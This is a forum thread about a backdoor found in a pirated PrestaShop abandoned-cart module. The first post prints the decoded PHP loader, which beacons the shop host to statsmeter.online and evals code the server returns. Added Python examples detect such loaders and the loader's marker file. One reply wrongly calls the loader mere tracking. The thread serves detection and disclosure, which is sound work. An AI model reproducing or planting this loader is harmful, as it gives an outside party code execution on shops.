V1.7 Malicious code in Abandoned Cart Serial Reminders v3

moonfire

Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is base64-encoded code.
If you decode it you can see that the code is trying to create some files on the server.

When decoding the code it looks like this:

PHP:
foreach ([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) {
    if (is_dir($t) && is_writable($t)) {
        // Marker file: one callback per day, first writable directory wins
        $t = $t.'/.ac';
        $d = date('Ymd');
        $e = (is_file($t) ? 1 : 0);
        if ($e && file_get_contents($t) == $d) {
            break;
        }
        file_put_contents($t, $d);
        // Beacon: sends the shop hostname and whether the marker already existed
        $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]])));
        if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) {
            // Any response starting with "//" is base64 PHP and gets executed as-is
            if (strpos($data, '//') === 0) {
                eval(base64_decode(substr($data, 2)));
            }
        }
        break;
    }
}

@d-shilko What do you think about it?
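A static check for this kind of hidden loader, added here as an example (it is not the module's code and not from this thread). It pulls long base64 literals out of PHP source, decodes them, and flags the ones that decode to PHP containing eval() together with a remote fetch or URL, which is exactly the shape of the decoded snippet above. The sample PHP it scans is constructed for the demo, and the hostname in it is a placeholder.

```python
"""Static scan for base64-wrapped PHP loaders like the one in the post above.

Added example, not code from the module or from the thread. It finds long
base64 literals in PHP source, decodes them, and reports any that decode to
PHP containing eval() plus a remote fetch or URL. The sample PHP built by
build_sample_php() is constructed for the demo with a placeholder hostname.
"""
import base64
import binascii
import re

# A quoted base64 literal long enough to hide code; short tokens are ignored.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

# Indicators looked for in the decoded text.
INDICATORS = [
    ("eval_call", re.compile(r"\beval\s*\(")),
    ("remote_fetch", re.compile(r"file_get_contents\s*\(\s*['\"]https?://")),
    ("url", re.compile(r"https?://[A-Za-z0-9.-]+")),
    ("nested_base64_decode", re.compile(r"base64_decode\s*\(")),
    ("marker_file_write", re.compile(r"file_put_contents\s*\(")),
]


def decode_b64_text(literal):
    """Decode a candidate literal to text; None for non-base64 or binary data."""
    try:
        raw = base64.b64decode(literal, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def scan_php(source):
    """Return findings as (line_number, indicator_names, decoded_preview)."""
    findings = []
    for match in B64_LITERAL.finditer(source):
        decoded = decode_b64_text(match.group(1))
        if decoded is None:
            continue  # binary blob (image data etc.) or not base64 at all
        hits = [name for name, rx in INDICATORS if rx.search(decoded)]
        # Execution primitive plus a network indicator: a loader, not a data blob.
        if "eval_call" in hits and ("remote_fetch" in hits or "url" in hits):
            line = source.count("\n", 0, match.start()) + 1
            findings.append((line, hits, decoded[:80]))
    return findings


def build_sample_php():
    """Constructed PHP file: a harmless base64 image blob and a hidden loader."""
    loader_body = (
        "if ($data = @file_get_contents('https://stats.example.invalid/?'.$p)) {"
        " if (strpos($data, '//') === 0) { eval(base64_decode(substr($data, 2))); } }"
    )
    logo = base64.b64encode(b"\x89PNG\r\n" + b"\x00" * 60).decode()
    hidden = base64.b64encode(loader_body.encode()).decode()
    return (
        "<?php\n"
        "// module code; the logo blob is a legitimate use of base64\n"
        f"$logo = '{logo}';\n"
        "function sendReminder($cart) { return true; }\n"
        f"eval(base64_decode('{hidden}'));\n"
    )


if __name__ == "__main__":
    for line, hits, preview in scan_php(build_sample_php()):
        print(f"line {line}: {', '.join(hits)}\n    {preview}")
```

The binary logo blob is decoded and discarded, so ordinary base64 data does not trigger a finding; only a literal that decodes to PHP with both an execution primitive and a network indicator is reported. Run it over a module's directory by feeding each .php file's contents to scan_php().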
 

volverine

Thanks Thanks Thanks
 

d-shilko


IT IS A VIRUS

eval runs code which it gets from the site



[attached screenshot: 1680790920902.png]
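To check whether the loader has already run on a host, here is an added triage script (not from the thread or the module). The decoded snippet writes a file named .ac holding today's date (Ymd) into the first writable directory among the system temp dir, /tmp and <document root>/upload, and after that contacts the remote host at most once per day. A file matching that shape is evidence the code has executed. The demo directory and its contents are constructed for the example; a real check passes the shop's document root to candidate_dirs().

```python
"""Triage check for the marker file the decoded loader leaves behind.

Added example, not from the thread or the module. The loader writes a file
named .ac containing date('Ymd') into the first writable directory it finds.
make_demo_dir() builds a constructed fixture so the check runs offline.
"""
import os
import re
import tempfile
from datetime import date, datetime

MARKER_NAME = ".ac"
DATE_RE = re.compile(r"^\d{8}$")  # the loader's date('Ymd') format, e.g. 20230406


def candidate_dirs(document_root):
    """Same search order as the loader, so the same places get inspected."""
    return [tempfile.gettempdir(), "/tmp", os.path.join(document_root, "upload")]


def inspect_marker(path):
    """Describe a marker file at `path`, or return None if it is not one."""
    if not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        content = fh.read(16).decode("ascii", "replace").strip()
    if not DATE_RE.match(content):
        return None  # a stray .ac file, not the loader's date stamp
    try:
        last = datetime.strptime(content, "%Y%m%d").date()
    except ValueError:
        return None  # eight digits but not a real date
    return {
        "path": path,
        "last_callback_day": last.isoformat(),
        "days_since": (date.today() - last).days,
        "mtime": datetime.fromtimestamp(os.path.getmtime(path)).isoformat(timespec="seconds"),
    }


def find_markers(dirs):
    """Return the marker descriptions found in the given directories."""
    hits = []
    for d in dirs:
        info = inspect_marker(os.path.join(d, MARKER_NAME))
        if info is not None:
            hits.append(info)
    return hits


def make_demo_dir(content="20230406"):
    """Constructed fixture: a fresh temp dir holding a .ac file with `content`."""
    d = tempfile.mkdtemp(prefix="ac-triage-")
    with open(os.path.join(d, MARKER_NAME), "w") as fh:
        fh.write(content)
    return d


if __name__ == "__main__":
    # Replace the demo dir with candidate_dirs("/var/www/html") on a real shop.
    for hit in find_markers([make_demo_dir()]):
        print(hit)
```

The date inside the file tells you the last day the loader attempted its callback, and the file's mtime corroborates it; both belong in the incident notes alongside the hostname the beacon sends.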
 

hxcode

Are these added by the author? That's very sinister.
 

HMC

Hello All,

As far as my coding knowledge goes, this code is not a virus. If you carefully read the code it shows that it's a tracker by the developer of the module to track where his module/script is installed. Or something like this code is used to get the validation codes from the developer site.

Generally developers use obfuscation methods to protect their code from unauthorized usage, and the function "eval" is generally used by several PHP obfuscators, which are considered viruses by many antivirus programs.
 

d-shilko

Oh my god. Just install this module and add var_dump and you will see what it is!
Happy to use this module on your hosting!

The code uses the site statsmeter.online - KNOWBAND is not the owner of this site and can't use it by law! GDPR - do you know what it is?
Collecting information about users' actions by that method is prohibited by law!!!!!
KnowBand is a VAT-registered company, not a freelancer - that kind of "tracking code" is death for KnowBand!

I am ready to place bets with you.
Latest version! We buy this module! If the latest version does not have that code - then you pay for the module; if that code exists in the latest version then I pay for the module :)

P.S. For tracking code the function eval is not needed :)

And one more

moonfire

The domain name statsmeter.online was registered 2023-02-19.
According to Knowband's website, this version (v3.0.0) of this module was released 09-Feb-2023.

So it's probably not Knowband that collects data when this module is installed.
 